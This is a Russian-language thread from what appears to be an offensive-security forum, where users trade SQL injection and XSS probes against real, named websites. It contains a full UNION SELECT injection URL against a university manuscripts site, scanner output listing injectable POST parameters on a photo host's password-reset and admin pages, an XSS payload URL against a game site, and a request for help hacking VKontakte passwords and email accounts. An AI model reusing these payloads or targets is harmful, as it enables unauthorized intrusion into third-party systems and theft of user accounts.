ANTICHAT — форум по информационной безопасности, OSINT и технологиям

у меня просто на днях было что ордер показывал 12 а унион говорил типа неверно.
Я перебирал униуном и нашол

я дошол перебором до 70 колонок, тем более что есть sql запрос - и из него видно что выбераеться 16 значений, а ладно, на ковырейте, мне просто интересно почему так -
http://manuscripts.cmrs.ucla.edu/Manuscripts_list.php?a=querysearch&value=3&whereSt ring=TRUE)+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16/*
по всей видимости это какая то бага совместого использования distinct и union, короче хз.

AkyHa_MaTaTa, DISTINCT тут не при чём... Походу этот запрос как-то изменяется в зависимости от какого-то условия...

при поиске Blind SQL, мне сканер выдал

http://www.radikal.ru/action.aspx

The POST variable M is vulnerable
The POST variable VM is vulnerable
The POST variable V is vulnerable

http://www.radikal.ru/REGISTER/PageLostPassword.aspx

The POST variable in_reset_code is vulnerable
The POST variable in_new_pass_conf is vulnerable

http://www.radikal.ru/toadmin.aspx

The POST variable cb_type is vulnerable

что с этим сделать можно?

http://avalon-game.in/game/2/f_site_found.php?login=%3Cscript%3Ealert('%C8%20%F D%F2%EE%E3%EE%20%F7%E5%F0%E5%E7%20SQL%20%E8%ED%FC% E5%EA%F6%E8%FE%20%EF%F0%E8%F1%E0%ED%F3%F2.');%3C/script%3E - что это? и что дальше делать? Извените заранее если это тупо, я есчё нуб

мне нужно научится взламывать пароли и мэйлы вконтакте,помогите плиз... очень нужно

Малоуважаемый vellition, ваш вопрос не в тему, так как в в файле f_site_found.php всего 5 строчек, из которых ни в одной из них нет ни слова о работе с базой данных. В данной ситуации могу посоветовать разве что прочитать книжку "PHP для бокланов".

http://veng.ru/index.php?page='


Что дальше что не подбирал не лез(((

Заранее благодарен!

Вот что побыстрому нарыл:
4ая версия.

и
От сюда делаю вывод что юзер root,но даже доступа к mysql.user нету т.к. даже '1' не возвращает про file_priv и password вообще молчу.